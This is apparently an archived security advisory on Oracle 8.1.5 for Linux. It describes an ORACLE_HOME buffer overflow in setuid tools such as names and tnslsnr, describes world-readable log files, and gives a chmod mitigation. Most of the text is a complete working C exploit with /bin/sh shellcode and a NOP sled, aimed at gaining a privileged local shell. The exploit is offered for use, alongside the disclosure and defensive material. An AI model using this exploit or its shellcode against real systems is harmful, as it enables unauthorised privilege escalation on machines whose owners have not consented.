|
|
|
|
| |
| There are two security vulnerabilities in Linux Oracle. One is an exploitable buffer overflow; the other is insecure creation of log files that contain sensitive information. |
| |
Credit:
The information has been provided by KimYongJun.
Exploit code has been provided by loveyou.
|
| |
Vulnerable systems:
Oracle 8.1.5
1. Buffer overflow
It is possible to create a buffer overflow vulnerability using "ORACLE_HOME", one of the environmental values of Oracle. Oracle applications that are vulnerable to buffer overflow are as follows:
- names
- namesctl
- onrsd
- osslogin
- tnslsnr
- tnsping
- trcasst
- trcroute
These applications allow an attacker to execute a buffer overflow exploit.
2. Log-files created
When a user executes one of Oracle applications such as names, oracle or tnslsnr, the following log files are created, note the security permissions are world-readable.
names
-rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
-rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
-rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
oracle
-rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
tnslsnr
-rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
Solution:
Contact your vendor for a patch or close setuid permission:
# su - oracle
$ cd /oracle_8.1.5_install_directory/bin
$ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
Exploit Code (Buffer overflow):
/*
Oracle 8.1.5 exploit
-by loveyou
offset value : -500 ~ +500
*/
#include <stdio.h>
#include <stdlib.h>
#define BUFFER 800
#define NOP 0x90
#define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
char shellcode[] =
/* - K2 - */
/* main: */
"\xeb\x1d" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\x29\xc0" /* subl %eax, %eax */
"\x40" /* incl %eax */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\xde\xff\xff\xff" /* call start */
"/bin/sh";
unsigned long getesp(void)
{
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[])
{
char *buff, *ptr,binary[120];
long *addr_ptr, addr;
int bsize=BUFFER;
int i,offset;
offset = 0 ;
if ( argc > 1 ) offset = atoi(argv[1]);
buff = malloc(bsize);
addr = getesp() - 5933 - offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
memset(buff,bsize/2,NOP);
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
setenv("ORACLE_HOME",buff,1);
printf("[ offset:%d buffer=%d ret:0x%x ]\n",
offset,strlen(buff),addr);
system(PATH);
}
|
|
|
|
|
